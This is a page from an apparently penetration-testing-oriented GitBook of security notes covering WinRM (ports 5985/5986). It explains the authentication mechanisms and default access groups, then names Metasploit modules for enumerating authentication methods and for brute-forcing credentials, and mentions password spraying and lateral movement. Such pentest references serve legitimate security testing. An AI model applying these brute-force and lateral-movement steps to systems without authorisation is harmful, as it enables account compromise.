InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Overview
  • Enumerate supported authentication mechanisms
  • Credentials brute forcing
  • Remote commands execution
  1. L7

5985 / 5986 - WSMan

Overview

Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, protocol that allows hardware and operating systems, from different vendors, to interoperate.

WinRM can be used to perform various management tasks remotely, including, but not limited to, running batch and PowerShell commands or scripts. Communications are performed over HTTP, port TCP 5985, or HTTPS, port TCP 5986.

WinRM supports multiples authentication mechanisms:

  • Basic / Digest: basic authentication for local Windows accounts. Credentials are base64 encoded and sent to the server ;

  • Negotiate: use negotiate authentication for both local and domain joined accounts, also known as Windows Integrated Authentication. By default only the built-in local Administrator and domain-joined accounts can connect through Negotiate. If the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ System\LocalAccountTokenFilterPolicy is set to 1, all local accounts in the Administrators group to access the service.

  • Client Certificate-based: authentication is made using a client certificate mapped to a local Windows account on the server ;

  • Kerberos: use Kerberos authentication for domain joined accounts ;

  • ntlm: use NTLM authentication for both local and domain joined accounts ;

  • credssp: use CredSSP authentication mechanism for both local and domain joined accounts.

Members of the Windows built-in Administrators and Remote Management Users groups are allowed, by default, to access a remote machine through WinRM:

(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
  NT AUTHORITY\INTERACTIVE AccessAllowed, BUILTIN\Administrators AccessAllowed, BUILTIN\Remote Management Users AccessAllowed

WinRM presents a limited attack surface, with no publicly known vulnerability to date (May-2019) and is subject to Windows anti brute forcing mechanisms. WinRM can thus be mostly used for lateral movement after an initial account compromise.

Enumerate supported authentication mechanisms

The Metasploit module auxiliary/scanner/winrm/winrm_auth_methods can be used to enumerate the authentication mechanisms, listed above, supported by the remote WinRM service.

msf> use auxiliary/scanner/winrm/winrm_auth_methods

May returns false negatives on recent and up to date WinRM service.

Credentials brute forcing

The Metasploit module auxiliary/scanner/winrm/winrm_login can be used to conduct a brute force attack against a WinRM service.

Note that the account lockout policies for either local or domain joined account will apply. Vertical brute forcing attack will thus most likely result in account lockout. WinRM could however be used in passwords spraying attack, for more information refer to the Active Directory - Passwords spraying note.

msf> use auxiliary/scanner/winrm/winrm_login

Remote commands execution

To execute commands through WinRM using known credentials, refer to the Windows - Lateral movements note.

Previous3389 - RDPNext8000 - JDWP

Last updated 2 years ago